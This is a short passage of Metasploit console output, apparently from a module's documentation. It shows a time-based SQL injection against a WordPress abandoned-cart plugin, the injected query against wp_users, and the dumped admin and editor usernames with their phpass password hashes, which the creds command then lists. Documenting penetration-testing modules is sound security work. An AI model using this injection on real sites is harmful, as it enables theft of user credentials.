[+] Vulnerable version detected
[*] Nonce: b56eb3a2cb
[*] Enumerating Usernames and Password Hashes
[*] {SQLi} Executing (select group_concat(PghfuFZ) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) PghfuFZ from wp_users limit 3) eOMLbNMh)
[*] {SQLi} Time-based injection: expecting output of length 124
[+] wp_users
========
user_login user_pass
---------- ---------
admin $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0
admin2 $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1
editor $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/wp_abandoned_cart_sqli) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
111.111.1.111 admin2 $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1 Nonreplayable hash phpass
111.111.1.111 editor $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/ Nonreplayable hash phpass
111.111.1.111 admin $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0 Nonreplayable hash phpass
```

Some files were not shown because too many files have changed in this diff Show More